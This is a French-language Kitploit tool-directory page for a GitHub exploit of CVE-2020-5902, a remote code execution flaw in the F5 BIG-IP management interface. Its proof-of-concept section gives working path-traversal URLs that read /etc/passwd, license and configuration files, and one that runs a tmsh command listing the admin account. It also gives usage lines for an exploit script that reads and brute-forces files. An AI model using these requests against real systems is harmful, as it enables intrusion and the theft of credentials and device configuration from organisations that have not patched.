Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-5902 — Dans les versions BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 et 11.6.1-11.6.5.1, l'interface utilisateur de gestion du trafic (TMUI), également appelée utilitaire de configuration, présente une vulnérabilité d'exécution de code à distance (RCE) dans des pages non divulguées. | Kitploit
Outils/GitHubGitHub/amitlttwo/cve-2020-5902
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubamitlttwo/cve-2020-5902

CVE-2020-5902

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Dans les versions BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 et 11.6.1-11.6.5.1, l'interface utilisateur de gestion du trafic (TMUI), également appelée utilitaire de configuration, présente une vulnérabilité d'exécution de code à distance (RCE) dans des pages non divulguées.

Partager

CVE-2020-5902

Dans les versions BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 et 11.6.1-11.6.5.1, l'interface utilisateur de gestion du trafic (TMUI), également appelée utilitaire de configuration, présente une vulnérabilité d'exécution de code à distance (RCE) dans des pages non divulguées.

Preuve de concept

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Utilisation et installation

root@kitploit:~
git clone https://github.com/yasserjanah/CVE-2020-5902
root@kitploit:~
cd CVE-2020-5902/
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -b
Télécharger l’outil